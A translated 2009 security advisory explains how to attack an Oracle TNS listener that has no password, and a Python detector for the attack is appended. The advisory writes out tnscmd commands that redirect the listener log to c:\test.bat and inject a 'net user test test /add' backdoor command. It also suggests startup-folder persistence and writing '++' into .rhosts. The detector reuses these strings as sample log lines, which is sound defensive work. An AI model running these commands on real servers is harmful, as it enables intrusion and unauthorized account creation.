Attack methods against the Oracle TNS listener (concluding part) - vulnerability warning - Heiba Security Net (黑吧安全网)

ID: MYHACK58:62200922399
Type: myhack58
Reporter: Anonymous (佚名)
Modified: 2009-03-05T00:00:00


First, depending on the version, the TNS listener can be susceptible to several kinds of buffer overflow attack, and these attacks can be carried out without supplying any user ID or password. For example, in Oracle 9i a client request that carries an overly long service_name triggers an overflow: when the listener builds the error message for its log, the service_name value is copied into a fixed-size buffer on the stack, and the overflow overwrites the saved return address, which can give an attacker control of execution. In fact, the TNS listener has had many overflow and format string vulnerabilities over time.

Second, another class of attacks involves the listener's log files. These attacks only work when no password has been set on the listener.

Assuming the listener has no password set, the attack proceeds as follows:

tnscmd -h -p 1521 --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))" -- sets the log directory to the C: drive

tnscmd -h -p 1521 --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))" -- sets the log file to test.bat

tnscmd -h --rawcmd "(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))" -- submits the commands

The commands dir >test.txt and net user test test /add are thereby written into c:\test.bat. Because of the double vertical bar (||), when the first command fails the Windows command interpreter executes the command that follows it; the listener's error message text is effectively commented out, so the commands we submitted are executed.

By setting the log file to some other directory, such as the Windows startup folder, the code submitted by a malicious user will run when the server restarts, compromising it.

Oracle running on UNIX systems is exposed to the same threat. One method is to write "++" into the .rhosts file; once the system is running, the r* services commands can then be used.
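As an added detection example that is not part of the original advisory, the following Python parses the TNS connect descriptor recorded in listener.log entries and flags the remote log_file/log_directory commands and the malformed, shell-operator-laden descriptor described above. The log line layout, the sample lines and the default expected log directory are all constructed assumptions, not real Oracle output.

```python
import re
SENSITIVE_COMMANDS = {"log_file", "log_directory", "trc_file", "trc_directory"}  # remote admin commands abused above
EXECUTABLE_SUFFIXES = (".bat", ".cmd", ".exe", ".rhosts")

def parse_tns(s, pos=0):
    """Parse TNS keyword-value syntax, e.g. (A=(B=1)(C=x)), into nested dicts; return (dict, end offset)."""
    out = {}
    while s[pos:pos + 1] == "(":
        eq = s.find("=", pos)
        key = s[pos + 1:eq].strip() if eq != -1 else ""
        if not re.fullmatch(r"\w+", key):  # catches the key-less '((' string the advisory sends
            raise ValueError(f"bad key at offset {pos + 1}")
        if s[eq + 1:eq + 2] == "(":
            val, pos = parse_tns(s, eq + 1)
        else:
            pos = s.find(")", eq + 1)
            val = s[eq + 1:pos].strip() if pos != -1 else None
        if val is None or s[pos:pos + 1] != ")":
            raise ValueError(f"unbalanced descriptor near offset {eq}")
        out[key.upper()], pos = val, pos + 1
    return out, pos

def inspect_log_line(line, log_dir="c:\\oracle\\network\\log"):
    """Findings for one listener.log line; constructed layout 'TIMESTAMP * descriptor * ... * return code'."""
    parts = [p.strip() for p in line.split(" * ")]
    if len(parts) < 2 or not parts[1].startswith("("):
        return []
    try:
        cd = parse_tns(parts[1])[0].get("CONNECT_DATA", {})
    except ValueError as exc:  # the listener writes the rejected string into its log verbatim
        found = [f"malformed connect descriptor ({exc})"]
        if re.search(r"\|\||&&|>", parts[1]):
            found.append("shell operators in descriptor: possible log-file command injection")
        return found
    cmd = cd.get("COMMAND", "").lower() if isinstance(cd, dict) else ""
    if cmd not in SENSITIVE_COMMANDS:
        return []
    found = [f"remote listener admin command '{cmd}'"]
    value = str(cd.get("VALUE", "")).lower()
    if cmd.endswith("_file") and value.endswith(EXECUTABLE_SUFFIXES):
        found.append(f"log/trace file renamed to executable '{value}'")
    if cmd.endswith("_directory") and value.rstrip("\\/") != log_dir.lower().rstrip("\\/"):
        found.append(f"log/trace directory moved to '{value}'")
    return found

SAMPLE_LOG = [  # constructed listener.log lines in the simplified layout above (not real Oracle output)
    "05-MAR-2009 10:12:01 * (CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=sqlplus)(HOST=client1)(USER=app))) * establish * orcl * 0",
    "05-MAR-2009 10:13:44 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)) * log_directory * 0",
    "05-MAR-2009 10:13:45 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)) * log_file * 0",
    "05-MAR-2009 10:13:46 * (CONNECT_DATA=(( ||dir >test.txt||net user test test /add)) * 1153 TNS-01153: Failed to process string",
]
```

Running inspect_log_line over SAMPLE_LOG yields nothing for the normal connection and two findings for each of the three attack lines; a listener password (or ADMIN_RESTRICTIONS in listener.ora) prevents the first two commands from being accepted at all.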